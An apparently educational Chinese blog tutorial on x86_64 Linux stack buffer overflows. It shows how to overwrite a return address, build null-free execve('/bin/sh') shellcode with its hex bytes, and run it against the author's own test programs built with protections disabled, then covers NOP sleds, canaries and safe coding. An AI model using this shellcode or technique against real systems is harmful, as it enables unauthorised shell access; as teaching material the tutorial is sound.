前言
在现在的网络攻击中,缓冲区溢出方式的攻击占据了很大一部分,缓冲区溢出是一种非常普遍的漏洞,但同时,它也是非常危险的一种漏洞,轻则导致系统宕机,重则可导致攻击者获取系统权限,进而盗取数据,为所欲为。
其实缓冲区攻击说来也简单,请看下面一段代码:
void main(int argc, char *argv[]) {char buffer[8];
if(argc > 1) strcpy(buffer, argv[1]);
}
当我们在对 argv[1]
进行拷贝操作时,并没对其长度进行检查,这时候攻击者便可以通过拷贝一个长度大于 8 的字符串来覆盖程序的返回地址,让程序转而去执行攻击代码,进而使得系统被攻击。
本篇主要讲述缓冲区溢出攻击的基本原理,我会从程序是如何利用栈这种数据结构来进行运行的开始,试着编写一个 shellcode,然后用该 shellcode 来溢出我们的程序来进行说明。我们所要使用的系统环境为 x86_64 Linux,我们还要用到 gcc(v7.4.0)、gdb(v8.1.0)等工具,另外,我们还需要一点汇编语言的基础,并且我们使用 AT&T 格式的汇编。
就我个人而言,作为一个新手,我还是比较怂来写这篇文章而言的,如果你发现又任何的错误或者不恰当的地方,欢迎指出,希望这篇文章对您有帮助。
进程
在现代的操作系统中,进程是一个程序的运行实体,当在操作系统中运行一个程序是,操作系统会为我们的程序创建一个进程,并给我们的程序在内存中分配运行所需的空间,这些空间被称为进程空间。进程空间主要有三部分组成:代码段,数据段和栈段。如下图所示:
栈
栈是一种后入先出的数据结构,在现代的大多数编程语言中,都使用栈这种数据结构来管理过程之间的调用。那什么又是过程之间的调用呢,说白了,一个函数或者一个方法便是一个过程,而在函数或方法内部调用另外的过程和方法便是过程间的调用。我们知道,程序的代码是被加载到内存中,然后一条条(这里指汇编)来执行的,而且时不时的需要调用其他的函数。当一个调用过程调用一个被调用过程时,所要执行的代码所在的内存地址是不同的,当被调用过程执行完后,又要回到调用过程继续执行。调用过程调用被调用过程时,需要使用 call
指令,并在 call
指令后指明要调用的地址,例如 call 地址
,当被调用过程返回时,使用ret
指令来进行返回,但是并不需要指明返回的地址。那么程序是怎么知道我们要返回到什么地方呢?则主要是栈的功劳:执行 call
指令时,程序会自动的将 call
的下一条指令的地址加入到栈中,我们叫做返回地址。当程序返回时,程序从栈中取出返回地址,然后使程序跳转到返回地址处继续执行。
另外,程序在调用另一个过程时需要传递的参数,以及一个过程的局部变量(包括过程中开辟的缓冲区)都要分配在栈上。可见,栈是程序运行必不可少的一种机制。
但是,聪明的你可能一想:不对,既然程序的返回地址保存在栈上,过程的参数以及局部变量也保存在栈上,我们可以在程序中操纵参数和局部变量,那么我们是否也能操作返回地址,然后直接跳转到我们想要运行的代码处呢?答案当然是肯定的。
改变程序的返回地址
我们看这也一个程序。
example.c
void func() {
long *res;
res = &res + 2;
*res += 7;
}
void main() {
int x = 1;
func();
x = 0;
printf("%d\n", x);
}
我们在 shell 中使用如下命令编译运行一下,对于 gcc 编译时所用的参数,我们先卖个关子。
$ `gcc -fno-stack-protector example.c -o example`
$ ./example
你或许会说:“哎呀呀,不用看了,这么简单,运行结果是 0 嘛”。但结果真的是这样嘛。其实,这个程序的运行结果是 1。“什么,这怎么可能是 1 嘛,不得了不得了”
还记的我们提到的我们可以在程序中改变过程的返回地址吗?在 func
中,看是是对 res 进行了一些无意义的操作,但是这却改变了 func
的返回地址,跳过了 x = 0
这条赋值命令。让我们从汇编的层面上看一下这个程序是如何执行的。
$ gdb gdb example
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
...
gdb-peda$ disassemble func
Dump of assembler code for function func:
0x000000000000064a <+0>: push %rbp
0x000000000000064b <+1>: mov %rsp,%rbp
0x000000000000064e <+4>: lea -0x8(%rbp),%rax
0x0000000000000652 <+8>: add $0x10,%rax
0x0000000000000656 <+12>: mov %rax,-0x8(%rbp)
...
0x000000000000066e <+36>: retq
End of assembler dump.
在 gdb 中,我们使用 disassemble func
来查看一下 func
函数的汇编代码,在这里,程序栈上的情况是这样的,其中栈的宽度为 8 字节:
一看程序你也许会明白了,在 4~12 行(实际上这里的行应该是该条指令在该函数中第几个字节处,这里为了方便姑且就这样叫吧)程序取得 res
的地址, 并将其地址加上 0x10(即 16),这对应程序的 res = &res + 2;
,此时res
指向的便是返回地址所在的地址了,然后使用 *res += 7
来改变返回地址。至于为什么是加 7 而不是其他数,是因为我们的目的是跳过执行 x = 0
,而x = 0
这条程序所占的字节数刚好为 7 个。我们使用 disassemble main
来查看一下 main
函数的汇编代码。
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x000000000000066f <+0>: push %rbp
0x0000000000000670 <+1>: mov %rsp,%rbp
0x0000000000000673 <+4>: sub $0x10,%rsp
0x0000000000000677 <+8>: movl $0x1,-0x4(%rbp)
0x000000000000067e <+15>: mov $0x0,%eax
0x0000000000000683 <+20>: callq 0x64a <func>
0x0000000000000688 <+25>: movl $0x0,-0x4(%rbp)
0x000000000000068f <+32>: mov -0x4(%rbp),%eax
...
End of assembler dump.
上面的汇编代码中,第 25 行便是 x = 0
这条程序的汇编指令,我们的目的是跳过它,也就是说我们要直接执行第 32 行处的代码,现在返回地址是指向第 25 行的(还记得前面说的返回地址是 call
指令下一条指令的地址吗),为了跳过它,我们给返回地址加 7。
覆盖返回地址
现在,我们大概了解了如何修改返回地址让程序跳转到我们指定的地方执行,但是要攻击的程序可不是我们编写的啊,我们只是知道程序的某个地方有个缓冲区可以让我们往里面写数据,我们可没有变法改变程序的代码啊。这个时候,我们就要说一说关于缓冲区的拷贝这件事了。
还记的我们开头的程序吗?这里我们为了调试起来方便,我们给它加个输出。
test.c
void main(int argc, char *argv[]) {char buffer[8];
if(argc > 1) strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
我们的程序在栈上的结构大概是下面这个样子。这里将我们的栈换了个样子
当程序对 argv[1]
进行拷贝操作时,依次将字符从低地址写向高地址。当 argv[1]
的长度小于 8 时,我们的缓冲区 buffer
空间足够,拷贝没有问题可以完成,但当我们的 argv[1]
的过长的话,长到将返回地址都覆盖了的话,main
函数的返回地址就不知道返回到哪里去了。
让我们来试一下:
$ gcc -fo-stack-protector -o test test.c
$ ./test hello
hello
$ ./test helloworld
helloworld
$ ./test helloworld123456789
helloworld123456789
Segmentation fault
可以看到当我们给定的参数为 helloworld123456789
,我们的程序出现了段错误,也即是这时候,我们的返回地址被破环了,导致main
函数返回时出错。这时候的栈看起来是下面这个样子的:
对照前面的栈结构,发现 main
函数的返回地址的确被破坏了。若是我们往返回地址处覆盖一个我们想要执行的程序的地址,那是不是就可以执行我们的程序了呢?
shellcode
那么攻击时要执行什么程序呢?一般情况下,我们想通过缓冲区溢出来获取一个 shell,一旦有了 shell,我们就可以“为所欲为”了,因此我们也把这种程序叫做 shellcode。那么这个 shellcode 在哪呢,可以确定的是,系统管理员是不会在系统中留一个 shellcode 的,也并不会告诉你:嘿,我这里有一个 shellcode,地址是 xxxx,你快把返回地址给覆盖了,来着里执行吧。所以,这个 shellcode 还需要我们自己编写,并传到要攻击的系统上。那要传递到哪呢?缓冲区不正是一个好地方嘛。
我们知道,在冯·诺伊曼架构的计算机中,数据和代码是不加以明确区分的,也就是说,内存中某个地方的东西,它既可以看作是一个程序的数据,也可以当作代码来执行。所以,我们大概有了一个攻击思路:我们将我们的 shellcode 放在缓冲区中,然后通过覆盖返回地址跳转到我们 shellcode 处,进而执行我们的 shellcode
下面,我们来讨论如何编写一个 shellcode
首先,我们为了得到一个 shell,需要使用第 59 和 60 号系统调用,下面是他们的系统调用表,并以 C 语言的方式指明了他们的参数。
%rax | system call | %rdi | %rsi | %rdx |
---|---|---|---|---|
59 | sys_execve | const char *filename | const char *const argv[] | const char* const envp[] |
60 | sys_exit | int error_code |
他们分别对应 C 语言中的系统函数 int execve(const char *filename, char *const argv[], char *const envp[]);
和exit(int error_code)
,execve()
用于在一个进程中启动新的程序,它的第一个参数是指程序所在的路径,第二个参数是传递给程序的参数,数组指针 argv 必须以程序 filename 开头,NULL 结尾,最后一个参数为传递个程序的新环境变量。而 exit()
的参数指明它的退出代码。
下面这个 C 语言程序便可以获取一个 shell,当在获取的 shell 中输入 exit
时便可退出 shell,且退出代码为 0。
#include <stdio.h>
void main() {char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
exit(0);
}
现在,让我们从汇编的角度思考一下,该如何编写一个和上面这个程序功能相似的 shellcode。
- 首先,我们需要一个字符串 ”/bin/sh”,并且需要知道它的确切地址
- 然后,我们需要将参数传递给相应的寄存器
- 最后,调用系统调用。
如何方便的获取到一个字符串的地址呢?一种方法是将字符串放到一个 call
指令的后面,这样,当这个 call
指令执行的时候,该字符串的首地址便被加入到栈中。好了,我不再绕弯子了,下面给出一个 shellcode
jmp mycall
func: pop %rbx
mov %rbx, 0x8(%rsp)
movb $0x0, 0x7(%rsp)
movl $0x0, 0x10(%rsp)
mov $59, %rax
mov %rbx, %rdi
lea 0x8(%rsp), %rsi
lea 0x10(%rsp), %rdx
syscall
mov $60, %rax
mov $0, %rdi
syscall
mycall: call func
.string \"/bin/sh\"
现在,我们依次看一下每一条指令的意思。
1. jmp mycall
当 shellcode 执行时,会先执行这一条,这会使我们的程序跳转到第 14 行的 call 指令处
2. func: pop %rbx
我们从栈中获取返回地址,这也是字符串所在的地址
3. mov %rbx, 0x8(%rsp)
4. movb $0x0, 0x7(%rsp)
5. movl $0x0, 0x10(%rsp)
尽管我们有了字符串的地址,但是我们并没有第二个参数和第三个参数所在的地址,所以程序在栈上构造出第二个和第三个参数
6. mov $59, %rax
7. mov %rbx, %rdi
8. lea 0x8(%rsp), %rsi
9. lea 0x10(%rsp), %rdx
我们将参数传递给指定的寄存器
10. syscall
使用 syscall 指令进行系统调用,这在 x86 Linux 中为 int 0x80
11. mov $60, %rax
12. mov $0, %rdi
13. syscall
为了使我们的 shellcode 在退出 shell 后正常退出,需要调用下 exit 系统调用,退出代码为 0
14. mycall: call func
15. .string \"/bin/sh\"
现在,我们有了 shellcode,我们先用 C 语言内联汇编的方式测试一下它是否能运行。
shellcode_test.c
void main() {
__asm__(
"jmp mycall\n\t"
"func: pop %rbx\n\t"
"mov %rbx, 0x8(%rsp)\n\t"
"movb $0x0, 0x7(%rsp)\n\t"
"movl $0x0, 0x10(%rsp)\n\t"
"mov $59, %rax\n\t"
"mov %rbx, %rdi\n\t"
"lea 0x8(%rsp), %rsi\n\t"
"lea 0x10(%rsp), %rdx\n\t"
"syscall\n\t"
"mov $60, %rax\n\t"
"mov $0, %rdi\n\t"
"syscall\n\t"
"mycall: call func\n\t"
".string \"/bin/sh\""
);
}
试着编译运行一下:
$ gcc shellcode_test.c -o shellcode_test
$ ./shellcode_test
sh-4.4# exit
exit
$
Wow,我们的 shellcode 完全可行,但是现在还并没有结束。众所周知,程序在内存中都是以二进制的形式保存的,我们的程序也不例外,因为我们需要将我们的 shellcode 传递到缓冲区中去,如果直接传递代码,那显然是不行的,我们要传递的应该是编译生成的二进制才对,这样在目标机器上直接就可以执行。现在,我们使用 gdb 将我们的程序转换为二进制(确切的说应该是 16 进制,不过都一样嘛)
$ gdb gdb shellcode_test
....
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000000000005fa <+0>: push %rbp
0x00000000000005fb <+1>: mov %rsp,%rbp
0x00000000000005fe <+4>: jmp 0x639 <main+63>
0x0000000000000600 <+6>: pop %rbx
0x0000000000000601 <+7>: mov %rbx,0x8(%rsp)
0x0000000000000606 <+12>: movb $0x0,0x7(%rsp)
0x000000000000060b <+17>: movl $0x0,0x10(%rsp)
0x0000000000000613 <+25>: mov $0x3b,%rax
0x000000000000061a <+32>: mov %rbx,%rdi
0x000000000000061d <+35>: lea 0x8(%rsp),%rsi
0x0000000000000622 <+40>: lea 0x10(%rsp),%rdx
0x0000000000000627 <+45>: syscall
0x0000000000000629 <+47>: mov $0x3c,%rax
0x0000000000000630 <+54>: mov $0x0,%rdi
0x0000000000000637 <+61>: syscall
0x0000000000000639 <+63>: callq 0x600 <main+6>
0x000000000000063e <+68>: (bad)
0x000000000000063f <+69>: (bad)
0x0000000000000640 <+70>: imul $0x90006873,0x2f(%rsi),%ebp
0x0000000000000647 <+77>: pop %rbp
0x0000000000000648 <+78>: retq
End of assembler dump.
gdb-peda$ x /64xb main+4
0x5fe <main+4>: 0xeb 0x39 0x5b 0x48 0x89 0x5c 0x24 0x08
0x606 <main+12>: 0xc6 0x44 0x24 0x07 0x00 0xc7 0x44 0x24
0x60e <main+20>: 0x10 0x00 0x00 0x00 0x00 0x48 0xc7 0xc0
0x616 <main+28>: 0x3b 0x00 0x00 0x00 0x48 0x89 0xdf 0x48
0x61e <main+36>: 0x8d 0x74 0x24 0x08 0x48 0x8d 0x54 0x24
0x626 <main+44>: 0x10 0x0f 0x05 0x48 0xc7 0xc0 0x3c 0x00
0x62e <main+52>: 0x00 0x00 0x48 0xc7 0xc7 0x00 0x00 0x00
0x636 <main+60>: 0x00 0x0f 0x05 0xe8 0xc2 0xff 0xff 0xff
可以看到,除了字符串以外,我们的程序是从第 4 行到第 63 行,由于字符串在内存中保存的是 ascii 码,这里也就不需要获取其二进制了。
好了,现在我们已经有了 shellcode 的二进制了,但是还有一个问题。可以看到,我们的程序中有 0x00 这种数据,由于我们的 shellcode 作为字符串传递到缓冲区中的,这代表的恰恰是也个字符串的结束,也就是说,但我们的字符串往缓冲区拷贝的时候,当遇到 0x00 时,无论我们的 shellcode 有没有拷贝完,都会停止拷贝。我们可不想我们费尽千辛万苦写出的 shellcode 竟然只被拷贝的残缺不全。下面,我们改进一下我们的程序。
shellcode_test1.c
void main() {
__asm__(
"jmp mycall\n\t"
"func: pop %rbx\n\t"
"mov %rbx, 0x8(%rsp)\n\t"
"xor %rax, %rax\n\t"
"movb %al, 0x7(%rsp)\n\t"
"movl %eax, 0x10(%rsp)\n\t"
"movb $0x3b, %al\n\t"
"mov %rbx, %rdi\n\t"
"lea 0x8(%rsp), %rsi\n\t"
"lea 0x10(%rsp), %rdx\n\t"
"syscall\n\t"
"xor %rdi, %rdi\n\t"
"xor %rax, %rax\n\t"
"movb $60, %al\n\t"
"syscall\n\t"
"mycall: call func\n\t"
".string \"/bin/sh\""
);
}
对照 shellcode_test.c,我们只是改变了一些赋值操作。让我们看一下效果。
$ gcc shellcode_test1.c -o shellcode_test1
$ gdb shellcode_test1
...
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000000000005fa <+0>: push %rbp
0x00000000000005fb <+1>: mov %rsp,%rbp
0x00000000000005fe <+4>: jmp 0x62c <main+50>
0x0000000000000600 <+6>: pop %rbx
0x0000000000000601 <+7>: mov %rbx,0x8(%rsp)
0x0000000000000606 <+12>: xor %rax,%rax
0x0000000000000609 <+15>: mov %al,0x7(%rsp)
0x000000000000060d <+19>: mov %eax,0x10(%rsp)
0x0000000000000611 <+23>: mov $0x3b,%al
0x0000000000000613 <+25>: mov %rbx,%rdi
0x0000000000000616 <+28>: lea 0x8(%rsp),%rsi
0x000000000000061b <+33>: lea 0x10(%rsp),%rdx
0x0000000000000620 <+38>: syscall
0x0000000000000622 <+40>: xor %rdi,%rdi
0x0000000000000625 <+43>: xor %rax,%rax
0x0000000000000628 <+46>: mov $0x3c,%al
0x000000000000062a <+48>: syscall
0x000000000000062c <+50>: callq 0x600 <main+6>
0x0000000000000631 <+55>: (bad)
0x0000000000000632 <+56>: (bad)
0x0000000000000633 <+57>: imul $0x90006873,0x2f(%rsi),%ebp
0x000000000000063a <+64>: pop %rbp
0x000000000000063b <+65>: retq
End of assembler dump.
gdb-peda$ x /51xb main+4
0x5fe <main+4>: 0xeb 0x2c 0x5b 0x48 0x89 0x5c 0x24 0x08
0x606 <main+12>: 0x48 0x31 0xc0 0x88 0x44 0x24 0x07 0x89
0x60e <main+20>: 0x44 0x24 0x10 0xb0 0x3b 0x48 0x89 0xdf
0x616 <main+28>: 0x48 0x8d 0x74 0x24 0x08 0x48 0x8d 0x54
0x61e <main+36>: 0x24 0x10 0x0f 0x05 0x48 0x31 0xff 0x48
0x626 <main+44>: 0x31 0xc0 0xb0 0x3c 0x0f 0x05 0xe8 0xcf
0x62e <main+52>: 0xff 0xff 0xff
现在,我们的 shellcode 中已经没有 0x00 了,并且还变短了呢。
现在,我们试一试这个 shellcode 作为字符串能否运行。
shellcode.c
#include<stdio.h>
#include<string.h>
char shellcode[] = "\xeb\x2c\x5b\x48\x89\x5c\x24\x08\x48\x31\xc0\x88\x44\x24\x07\x89\x44\x24"
"\x10\xb0\x3b\x48\x89\xdf\x48\x8d\x74\x24\x08\x48\x8d\x54\x24\x10\x0f\x05"
"\x48\x31\xff\x48\x31\xc0\xb0\x3c\x0f\x05\xe8\xcf\xff\xff\xff/bin/sh";
void test() {
long *ret;
ret = (long *)&ret + 2;
(*ret) = (long)shellcode;
}
void main() {test();
}
$ gcc -z execstack -fno-stack-protector -o shellcode shellcode.c
$ ./shellcode
sh-4.4# exit
exit
$
哈,完全可以运行。
使用 shellcode
现在,我们已经有了 shellcode,我们在前面也提供了一种攻击思路,但是最终的困难却在于我们该如何利用缓冲区溢出来修改返回地址,说实话,到现在为止,博主并没有找到一个优雅的、简单的修改返回地址的方法。在我所看的一些文章中,唯一的方法就是“试”,这当然还需要靠点运气,更何况现在操作系统一般采用栈随机化,并不好“试”。
一种比较好的方法是在 shellcode 前面加上许多 nop
指令,并在后面加上许多要覆盖的返回地址。由于 nop
代表空指令,且只占一个字节,不管我们的返回地址返回到 shellcode 前面的任何一个nop
,程序都会执行到 shellcode 所在的地方,而不必非要返回到 shellcode 的开头处,这会大大增加 shellcode 被执行的机率。
但是,这对一些比较小的缓冲区却并不是很适用,因为比较小的缓冲区并不能有太多了 nop
或者太长的 shellcode,否则返回地址直接被 shellcode 或者甚至被 nop 给覆盖了,在别处看到的是,解决这类小缓冲区的方法也很简单,我们把返回地址放在前面,nop
放在中间,shellcode 放在最后面,就像这样:
这样理论上,nop
可以很多,执行 shellcode 的机会也会大大增加。
防范
现代编译器已经加入了许多防范缓冲区溢出的机制,例如缓冲区溢出检查(还记的我前面卖的关子吗?我们使用了 gcc 的 -fno-stack-protector 参数,就是让编译器不要加入这种机制,以免干扰我们的实验。)、禁止栈内执行代码(shellcode.c 编译时所用的 -z execstack,该参数是允许栈内代码执行)。缓冲区溢出检查是指在栈上的局部变量分配之前,先分配一些空间保存某个数,当在程序返回之前,先检查这个数有没有被改变,若被改变了,则立即触发中断,防止去执行 shellcode。另外,现代操作系统也加入了许多措施来阻止缓冲区溢出,比如栈的随机化(这又大大降低了我们“猜”中返回地址的机率)。
但是,尽管操作系统和编译器都加入了如此多的机制来防范缓冲区溢出,但是,攻击者总还是有种种办法绕过这些机制,所以,要从根本上杜绝缓冲区溢出,还是要从我们写程序入手,在对缓冲区操作前,一定要对其操作的范围进行限制,不要使用那些危险的函数,比如 gets
、不限制长度的strcpy
等等。
小结
程序依靠栈来执行,并将局部变量分配在栈上,call
指令也将返回地址放在栈上,这是可以进行缓冲区溢出的前提。
缓冲区溢出是通过覆盖返回地址,进而去执行攻击程序(shellcode)来实现的。
shellcode 编写完成后要转换为二进制(16 进制)数据,且不得出现 0x00,这代表了字符串的结束
防范缓冲区溢出要使用正确的编译选项,更重要的是正确的编写程序。
完